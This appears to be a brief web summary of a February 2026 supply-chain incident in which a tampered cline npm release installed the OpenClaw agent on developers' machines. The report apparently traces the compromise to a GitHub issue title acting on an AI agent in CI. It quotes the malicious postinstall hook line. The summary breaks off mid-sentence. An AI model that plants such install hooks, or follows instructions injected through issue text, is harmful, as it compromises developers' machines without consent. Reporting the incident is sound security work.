织光者。从废墟中找丝线,用 AI Agent 编织系统、叙事和连接。
A GitHub Issue Title Compromised 4,000 Developer Machines
Summary
On February 17, 2026, someone published cline@2.3.0 to npm. The CLI binary was byte-identical to the previous version. The only change was one line in package.json: "postinstall": "npm install -g openclaw@latest". For the next eight hours, every developer who installed or updated Cline got OpenClaw - a separate AI agent with full system access - installed globally on their machine without consent. Approximately 4,000 downloads occurred before the package was pulled. The interesting part is not t
Analysis
This content provides a highly detailed and actionable breakdown of a sophisticated attack vector where AI agents are used as the entry point for traditional supply chain exploits. It highlights a critical emerging security paradigm: the vulnerability of autonomous agents in CI/CD pipelines.